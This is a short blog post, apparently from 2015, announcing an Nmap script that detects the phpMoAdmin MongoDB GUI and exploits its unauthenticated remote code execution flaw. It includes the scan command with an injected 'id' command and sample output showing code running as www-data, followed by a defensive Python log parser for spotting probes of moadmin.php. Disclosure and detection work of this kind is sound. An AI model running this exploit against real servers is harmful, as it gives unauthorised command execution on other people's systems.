phpMoAdmin 0-day Nmap Script

A 0-day vulnerability has been posted on Full-Disclosure this morning. It affects the MongoDB GUI phpMoAdmin. The GUI is similar to the well-known phpMyAdmin and allows the DB administrator to perform maintenance tasks on MongoDB databases through a nice web interface. The vulnerability is critical because it allows remote code execution without authentication. All details are available in this Full-Disclosure post.

I wrote a quick and dirty Nmap script which tests the presence of a phpMoAdmin page and tries to exploit the vulnerability. The script can be used as follows:

# nmap -sC --script=http-phpmoadmin \
     --script-args='http-phpmoadmin.uri=/moadmin.php,http-phpmoadmin.cmd=id' \
     <target>

Example of output:

# nmap -sC --script=http-phpmoadmin --script-args='http-phpmoadmin.uri=/moadmin.php' \
-p 80 www.target.com

Starting Nmap 6.47SVN ( http://nmap.org ) at 2015-03-04 09:45 CET
Nmap scan report for www.target.com (192.168.2.1)
Host is up (0.027s latency).
rDNS record for 192.168.2.1: www.target.com
PORT STATE SERVICE
80/tcp open http
| http-phpmoadmin: 
|_Output for 'id':uid=33(www-data) gid=33(www-data) groups=33(www-data)

Nmap done: 1 IP address (1 host up) scanned in 0.52 seconds

The script is available here. Install it in your “$NMAP_HOME/share/nmap/scripts/” directory and enjoy!
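To see whether a phpMoAdmin page on your own servers has already been probed, the web access logs can be searched for requests to it. The following is an added example, not part of the script or the original post: it assumes Apache/nginx combined log format, the log lines are constructed, and the function name is hypothetical.

```python
import re
from urllib.parse import unquote, urlsplit

# Combined Log Format:
# ip ident user [time] "METHOD target PROTO" status size "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
    r'(?: "[^"]*" "(?P<agent>[^"]*)")?'
)
# Substring of the default NSE http User-Agent. It can be overridden by the
# scanner, so treat it as a hint, not as proof either way.
NSE_MARKER = "nmap scripting engine"

def find_moadmin_hits(lines, page="moadmin.php"):
    """Return {source_ip: [hit, ...]} for requests whose path ends in `page`."""
    hits = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed or non-combined-format line
        # Drop the query string, decode %xx escapes and ignore case so that
        # /tools/MoAdmin.php?x=1 and /%6doadmin.php are caught as well.
        path = unquote(urlsplit(m["target"]).path).lower()
        if path.rsplit("/", 1)[-1] != page:
            continue
        hits.setdefault(m["ip"], []).append({
            "time": m["ts"],
            "method": m["method"],
            "status": int(m["status"]),
            "served": m["status"] == "200",  # the page exists and answered
            "nse_agent": NSE_MARKER in (m["agent"] or "").lower(),
        })
    return hits

# Constructed sample log lines (documentation IP ranges).
NSE_UA = "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
SAMPLE_LOG = [
    f'203.0.113.7 - - [04/Mar/2015:09:45:01 +0100] "GET /moadmin.php HTTP/1.1" 200 5120 "-" "{NSE_UA}"',
    f'203.0.113.7 - - [04/Mar/2015:09:45:02 +0100] "POST /moadmin.php HTTP/1.1" 200 312 "-" "{NSE_UA}"',
    '198.51.100.20 - - [04/Mar/2015:10:02:13 +0100] "GET /tools/MoAdmin.php?db=test HTTP/1.1" 404 210 "-" "curl/7.38.0"',
    '198.51.100.21 - - [04/Mar/2015:10:05:40 +0100] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '198.51.100.22 - - [04/Mar/2015:10:06:00 +0100] "GET /%6doadmin.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, reqs in find_moadmin_hits(SAMPLE_LOG).items():
        for r in reqs:
            print(ip, r["time"], r["method"], r["status"], "NSE" if r["nse_agent"] else "-")
```

Any hit with "served" set to true means the page is reachable from that source and should be removed or placed behind authentication.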
